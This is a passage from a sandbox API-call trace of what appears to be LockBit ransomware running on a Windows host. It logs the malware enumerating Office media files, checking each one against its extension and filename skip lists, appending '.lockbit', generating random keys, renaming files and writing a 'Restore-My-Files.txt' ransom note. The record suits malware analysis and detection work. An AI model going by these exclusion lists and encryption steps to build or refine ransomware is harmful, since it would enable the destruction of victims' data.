(lpString1=".msi", lpString2=".WMF") returned -1 [0196.526] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.526] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.527] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.527] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0183328.WMF") returned 1 [0196.528] lstrcmpiW (lpString1="ntldr", lpString2="J0183328.WMF") returned 1 [0196.528] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0183328.WMF") returned 1 [0196.528] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0183328.WMF") returned -1 [0196.528] lstrcmpiW (lpString1="autorun.inf", lpString2="J0183328.WMF") returned -1 [0196.528] lstrcmpiW (lpString1="thumbs.db", lpString2="J0183328.WMF") returned 1 [0196.528] lstrcmpiW (lpString1="iconcache.db", lpString2="J0183328.WMF") returned -1 [0196.528] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.528] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183328.WMF") returned=".WMF" [0196.528] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.528] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.528] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.529] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.529] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183328.WMF.lockbit") returned 70 [0196.529] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183328.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0183328.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.531] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.531] malloc (_Size=0x40068) returned 0x3df0008 [0196.531] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5370) returned 1 [0196.531] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.531] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.532] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.532] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.532] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.532] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.538] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183328.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183328.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.538] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.538] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.546] free (_Block=0x1fa2ed8) [0196.546] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0183328.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.546] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.546] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.546] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf396a700, ftCreationTime.dwHighDateTime=0x1be0d1a, ftLastAccessTime.dwLowDateTime=0xbd47aa20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf396a700, ftLastWriteTime.dwHighDateTime=0x1be0d1a, nFileSizeHigh=0x0, nFileSizeLow=0x171c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0185604.WMF", cAlternateFileName="")) returned 1 [0196.546] lstrcmpiW (lpString1=".", lpString2="J0185604.WMF") returned -1 [0196.546] lstrcmpiW (lpString1="..", lpString2="J0185604.WMF") returned -1 [0196.546] PathFindExtensionW (pszPath="J0185604.WMF") returned=".WMF" [0196.546] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.547] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.548] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.548] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0185604.WMF") returned 1 [0196.548] lstrcmpiW (lpString1="ntldr", lpString2="J0185604.WMF") returned 1 [0196.548] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0185604.WMF") returned 1 [0196.548] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0185604.WMF") returned -1 [0196.548] lstrcmpiW (lpString1="autorun.inf", lpString2="J0185604.WMF") returned -1 [0196.548] lstrcmpiW (lpString1="thumbs.db", lpString2="J0185604.WMF") returned 1 [0196.548] lstrcmpiW (lpString1="iconcache.db", lpString2="J0185604.WMF") returned -1 [0196.548] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.548] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0185604.WMF") returned=".WMF" [0196.549] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.549] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.549] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.550] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0185604.WMF.lockbit") returned 70 [0196.550] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0185604.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0185604.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.551] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.552] malloc (_Size=0x40068) returned 0x3df0008 [0196.552] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5916) returned 1 [0196.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.552] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.552] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0196.552] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.553] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.553] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0196.553] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0196.558] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0185604.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0185604.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.558] malloc (_Size=0xa2) returned 0x1fa2ed8 [0196.558] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0196.568] free (_Block=0x1fa2ed8) [0196.569] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0185604.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0196.569] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0196.569] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.569] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdc0fec00, ftCreationTime.dwHighDateTime=0x1be0d23, ftLastAccessTime.dwLowDateTime=0xbd47aa20, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xdc0fec00, ftLastWriteTime.dwHighDateTime=0x1be0d23, nFileSizeHigh=0x0, nFileSizeLow=0x2f64, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0186002.WMF", cAlternateFileName="")) returned 1 [0196.569] lstrcmpiW (lpString1=".", lpString2="J0186002.WMF") returned -1 [0196.569] lstrcmpiW (lpString1="..", lpString2="J0186002.WMF") returned -1 [0196.569] PathFindExtensionW (pszPath="J0186002.WMF") returned=".WMF" [0196.569] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0196.569] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0196.570] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0196.570] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0186002.WMF") returned 1 [0196.571] lstrcmpiW (lpString1="ntldr", lpString2="J0186002.WMF") returned 1 [0196.571] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0186002.WMF") returned 1 [0196.571] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0186002.WMF") returned -1 [0196.571] lstrcmpiW (lpString1="autorun.inf", lpString2="J0186002.WMF") returned -1 [0196.571] lstrcmpiW (lpString1="thumbs.db", lpString2="J0186002.WMF") returned 1 [0196.571] lstrcmpiW (lpString1="iconcache.db", lpString2="J0186002.WMF") returned -1 [0196.571] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0196.571] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186002.WMF") returned=".WMF" [0196.571] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0196.571] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0196.571] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0196.572] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0196.572] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186002.WMF.lockbit") returned 70 [0196.572] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0186002.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0186002.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0196.574] CreateIoCompletionPort (FileHandle=0x170, 